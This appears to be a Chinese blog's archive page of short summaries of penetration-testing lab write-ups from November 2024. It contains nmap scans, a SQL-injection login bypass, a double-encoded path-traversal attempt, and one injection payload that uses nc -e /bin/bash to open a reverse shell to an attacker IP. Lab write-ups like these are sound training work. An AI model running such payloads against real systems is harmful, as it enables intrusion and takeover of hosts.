11 2024 档案
摘要:NMAP ┌──(root㉿kali)-[~/lab] └─# nmap -p- -A 192.168.189.110 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-30 00:22 UTC Nmap scan report for 19
阅读全文
摘要:nmap ┌──(root㉿kali)-[~/lab] └─# nmap -p- -A 192.168.189.43 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-29 02:10 UTC Stats: 0:00:17 elapsed;
阅读全文
摘要:nmap 21/tcp open ftp vsftpd 3.0.3 | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_Can't get directory listing: TIMEOUT | ftp-syst: | STAT: |
阅读全文
摘要:nmap ┌──(root㉿kali)-[~] └─# nmap -p- -A 192.168.170.160 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-27 04:45 UTC Nmap scan report for 192.16
阅读全文
摘要:nmap ┌──(root㉿kali)-[~/lab] └─# nmap -p- -A 192.168.189.221 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-26 00:11 UTC Stats: 0:01:03 elapsed;
阅读全文
摘要:nmap ┌──(root㉿kali)-[~] └─# nmap -p- -A 192.168.157.233 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-25 07:59 UTC Nmap scan report for 192.16
阅读全文
摘要:nmap ┌──(root㉿kali)-[~] └─# nmap -p- -A 192.168.157.117 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-25 04:32 UTC Stats: 0:00:55 elapsed; 0 h
阅读全文
摘要:nmap 发现9090 22 和3000端口 发现漏洞 但是不知道还能读到哪些敏感文件 hacktricks 看看 https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/grafana 通过hacktricks告
阅读全文
摘要:80端口弱口令admin admin 发现cms 搜索exp 发现漏洞 https://www.exploit-db.com/exploits/49876 找到敏感数据库密码和用户 ╔══════════╣ Searching passwords in config PHP files /var/w
阅读全文
摘要:刚刚做了一个太难得简直看不懂 现在来做个简单的找回信心 nmap ┌──(root㉿kali)-[/home/ftpuserr] └─# nmap -p- -A 192.168.132.25 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-
阅读全文
摘要:NMAP ┌──(root㉿kali)-[/home/ftpuserr] └─# nmap -p- -A 192.168.226.109 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-21 05:44 UTC Nmap scan repo
阅读全文
摘要:nmap ┌──(root㉿kali)-[~/lab] └─# nmap -p- -A 192.168.226.134 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-21 04:52 UTC Stats: 0:00:49 elapsed;
阅读全文
摘要:nmap ┌──(root㉿kali)-[~] └─# nmap -p- -A 192.168.175.166 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-20 04:41 UTC Nmap scan report for 192.16
阅读全文
摘要:一开始看到page=view/.html的时候就想到目录穿越了尝试../../../../../../../../../../../etc/passwd 发现不行 找半天其他可能存在漏洞的地方又找不到 卡壳了 看了看hints 他告诉我存在二次编码绕过 这点确实没想到 可以进行两次url编码再访问/
阅读全文
摘要:nmap扫描 ┌──(root㉿kali)-[~] └─# nmap -p- -A 192.168.157.145 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-18 04:47 UTC Nmap scan report for 192.
阅读全文
摘要:nmap 扫描 ┌──(root㉿kali)-[~] └─# nmap -p- -A 192.168.157.105 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-17 12:32 UTC Nmap scan report for 192
阅读全文
摘要:nmap 扫描 ┌──(root㉿kali)-[~] └─# nmap -p- -A 192.168.157.224 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-14 04:18 UTC Stats: 0:00:53 elapsed;
阅读全文
摘要:nmap 扫描 发现smba共享文件 ┌──(root㉿kali)-[~] └─# nmap -p- -A 192.168.167.64 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-14 00:33 UTC Stats: 0:01:42
阅读全文
摘要:点击查看代码 nmap -p- -A 192.168.167.174 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-12 00:09 UTC Nmap scan report for 192.168.167.174 Host is up
阅读全文
摘要:nmap 发现两个 web站 80 和 9090 还有 22端口 dirsearch 发现80端口有login.php 登录界面 发现没有弱口令 测试sql注入 测试了一会发现密码 password=' # 就绕过了 不过我没搞懂为啥就绕过了 要后面拿了root权限才知道 登录之后发现密码 jame
阅读全文
摘要:nmap 扫 到 80 22 dirsearch 扫描发现 ┌──(root㉿kali)-[~] └─# dirsearch -u http://192.168.167.13/ /usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: Dep
阅读全文
摘要:靶场很简单分数只有10分跟平常做的20分的中级靶场比确实简单 我拿来放松的 算下来30分钟解决战斗 nmap 扫到80端口web界面 是个框架 搜exp https://www.exploit-db.com/exploits/52023 他的脚本可能有点问题看不到回显 我们审脚本直接看到漏洞点所在
阅读全文
摘要:80端口web站点 dirsearch 没发现啥有用信息 感觉就是让我们突破登录框进后台的 https://github.com/ChurchCRM/CRM/issues/137 上网查到默认密码 登录后台 跟具cms查exp发现有个SQL注入 payload找半天找到一个 可以直接sql注入 ht
阅读全文
摘要:nmap + dirsearch 发现web站点 扫目录 ┌──(root㉿kali)-[/home/ftpuserr] └─# nmap -p- -A 192.168.167.39 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-09 0
阅读全文
摘要:nmap扫描 ┌──(root㉿kali)-[~] └─# nmap -p- -A 192.168.167.234 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-09 03:59 UTC Stats: 0:01:22 elapsed; 0
阅读全文
摘要:源码泄露 可以直接看到源码存在sql注入 反弹shellpayload http://192.168.167.162/phpinfo%22%20%20union%20select%20'system(%22nc%20-e%20/bin/bash%20192.168.45.250%2080%22);e
阅读全文